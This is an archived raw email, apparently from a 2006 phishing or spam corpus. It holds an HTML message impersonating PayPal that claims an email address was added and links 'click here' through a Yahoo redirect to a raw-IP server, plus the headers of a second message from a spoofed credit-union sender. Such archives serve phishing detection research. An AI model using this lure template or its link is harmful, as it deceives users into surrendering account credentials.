From: "service@paypal.com" <service@paypal.com>
Subject: You've added an additional email address to your PayPal account
Date: Sat, 20 May 2006 11:14:31 -0400
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060520151430.EBA556CD04A@mail1.example.com>
To: undisclosed-recipients:;
Status: 
X-Status: 
X-Keywords:                   

<html>

<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=Generator content="Microsoft Word 11 (filtered)">
<title>You've added an additional email address to your PayPal account</title> 
<style>
<!--
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 {margin:0in;
 margin-bottom:.0001pt;
 font-size:12.0pt;
 font-family:"Times New Roman";}
a:link, span.MsoHyperlink
 {color:blue;
 text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
 {color:purple;
 text-decoration:underline;}
p
 {margin-right:0in;
 margin-left:0in;
 font-size: 12.0pt;
 font-family:"Times New Roman";}
@page Section1
 {size:8.5in 11.0in;
 margin:1.0in 1.25in 1.0in 1.25in;}
div.Section1
 {page:Section1;}
-->
</style>

</head>

<body lang=EN-US link=blue vlink=purple>

<div class=Section1>

<p class=MsoNormal><span style='font-size:11.0pt'>You've added an additional
email address to your PayPal account.</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If you don't agree with this 
    email denismce93@comcast.net and if you need 
    assistance </span><span style='font-size: 11.0pt'>with your account, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>please <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//210.58.101.241/~mrtg/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> click here </a> to login to your account.</span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>To make sure you can use your 
    PayPal account the next time you make a purchase,</span></p>
  <p class=MsoNormal><span style='font-size: 11.0pt'> all you need to do is confirm 
    or not your email address. </span></p>

  <p class=MsoNormal><span style='font-size:11.0pt'>If your email program has problems 
    with hypertext links, </span></p>
  <p class=MsoNormal><span style='font-size:11.0pt'>you may also confirm your 
    email address by logging in to your account.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Thank you for using PayPal! </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>The PayPal Team</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>Please do not reply to this
email. This mailbox is not monitored and you will not receive a response.</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>For assistance, log in to
your PayPal account and click the <a target="_blank"  href="http://rds.yahoo.com/_ylt  LaSV66fNtDg.kAUoJXNyoA;_ylu=X3oDMTE2ZHVuZ3E3BGNvbG8DdwRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZANGNjU1Xzc1/SIG8vsd1jp/EXP38544186/**http%3a//210.58.101.241/~mrtg/.us/link.php?bWFpIHByb3N0=aWxvciBtYWkgc3VnZXRpIHB1bGEgZnV0dXZhIG1hbWVsZSBpbiBndXRhIGRlIGxhYmFyaSBjZSBzdW50ZXRpIHNpIGRvYm90b2NpIHBpc2VtYX" 
> Help</a> 
link located in the top right corner of any PayPal page. </span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>----------------------------------------------------------------</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>&nbsp;</span></p>

<p class=MsoNormal><span style='font-size:11.0pt'>PayPal Email ID PP059</span></p>

</div>

</body>

</html>

From info@nafcunet.org  Sat May 20 18:03:53 2006
Return-Path: <info@nafcunet.org>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id B56FA478C3
	for <nobody@login.example.com>; Sat, 20 May 2006 18:03:53 -0400 (EDT)
Received: from mail.unirent.de (unknown [212.224.2.194])
	by mail1.example.com (Postfix) with ESMTP id 1B27D6CD0D3
	for <nobody@example.com>; Sat, 20 May 2006 18:03:43 -0400 (EDT)
Received: from User ([208.176.152.168]) by mail.unirent.de with Microsoft SMTPSVC(6.0.3790.1830);
	 Sat, 20 May 2006 22:56:23 +0200
Reply-To: <service@nafcunet.org>
